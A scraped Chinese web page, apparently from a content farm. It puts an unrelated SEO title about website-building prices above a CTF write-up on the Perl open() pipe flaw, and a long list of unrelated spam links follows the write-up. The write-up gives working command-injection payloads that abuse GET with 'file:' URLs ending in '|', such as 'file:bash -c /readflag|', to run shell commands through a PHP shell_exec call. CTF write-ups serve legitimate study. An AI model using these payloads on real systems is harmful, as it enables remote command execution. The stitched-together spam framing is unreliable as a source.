当前位置: 首页 > news >正文

徐州做网站的云南网站制作多少钱

徐州做网站的,云南网站制作多少钱,htnl5 做的视频网站,国内自动化网站建设这里记录学习一下 perl的open缺陷 这里首先本地测试一下 发现这里使用open打开 的时候 如果通过管道符 就会实现命令执行 然后这里注意的是 perl 中的get 调用了 open的参数 所以其实我们可以通过管道符实现命令执行 然后这里如果file可控那么就继续可以实现命令执行 这里就…这里记录学习一下 perl的open缺陷 这里首先本地测试一下 发现这里使用open打开 的时候 如果通过管道符 就会实现命令执行 然后这里注意的是 perl 中的get 调用了 open的参数 所以其实我们可以通过管道符实现命令执行 然后这里如果file可控那么就继续可以实现命令执行 这里就是 open支持file协议 file协议加上| 可以将文件名 作为shell输出 touch id|GET file:id| 类似这种 然后我们可以开始做这个题目 $data shell_exec(GET . escapeshellarg($_GET[url]));$info pathinfo($_GET[filename]);$dir str_replace(., , basename($info[dirname])); 这里是内容 我们输入通过GET url 可以实现写入一个文件 这里考的其实就是 我们通过filename生成一个shell文件名字为shell 然后通过GET filename这种形式实现命令执行 然后再写入一个文件 这里可能比较抽象 我们来本地测试一下 这里我们首先可以通过 mkdir($dir);chdir($dir);file_put_contents(basename($info[basename]), $data); 这种确定是perl语言 然后 我们首先传入 url123filenamels| //目的创建一个shell名字的文件然后urlfile:ls|filename1.txt // 通过file协议和| 让ls不做为文件名 而变为shell 首先了命令执行 然后 这里可以发现是一个二进制文件 无法获取flag 我们通过 bash开启操作即可 ?url123|filenamebash -c /readflag|/?urlfile:bash -c /readflag|filename1.txt 然后我们就获取到了flag 这里或者可以通过反弹shell实现 但是麻烦了
http://www.pierceye.com/news/669377/

相关文章:

  • 成都建设网站哪家好事件营销的特点
  • 如何利用模板做网站视频wordpress手机版边侧导航
  • 网站制作在哪里找wordpress 设置登陆界面
  • 济南seo网站建设上海seo网站优化_搜索引擎排名_优化型企业网站建设_锦鱼网络
  • 深圳网站备影楼网站建设
  • asp网站开门桂林市区
  • dw个人网站主页怎么做网站前端用什么语言
  • 网站建设是平面设计吗网站如何做中英文双语言
  • 网站关键词先后论坛网站在线生成
  • 无为建设局网站安装wordpress xampp
  • 广药网站建设试卷wordpress人力资源模板下载
  • 电商网站规划的开发背景明年做那个网站能致富
  • 网站建设及托管合同wordpress页面批量生成二维码
  • 益阳市住房和建设局 网站哪些网站可做矿机期货
  • 网站开发哪里有html5网站赏析
  • 襄阳网站建设八零后做的网站怎么上传到网上运行
  • 学网站开发培训学校专业集团门户网站建设费用
  • 加快政务公开网站建设知名的摄影网站有哪些
  • 任县网站建设网络公司桐城网站开发
  • linux服务器做网站软装设计图效果图
  • 个人网站可以做商城吗被官方认可赚钱软件
  • 自己可以做网站服务器室内设计整套方案图
  • 网站建设商城网站微信广告代理
  • 创建网站的方案企业营销策划公司
  • 做彩铃的网站个人博客网站建设
  • 正黄集团博弘建设官方网站达州高端网站建设
  • 七台河建设网站wordpress logo制作
  • 怎么设计一个自己的网站番禺网站建设效果
  • 网站哪家做的好淄博网站开发选网泰
  • 网站建设与制作与维护ppt百度广告联盟收益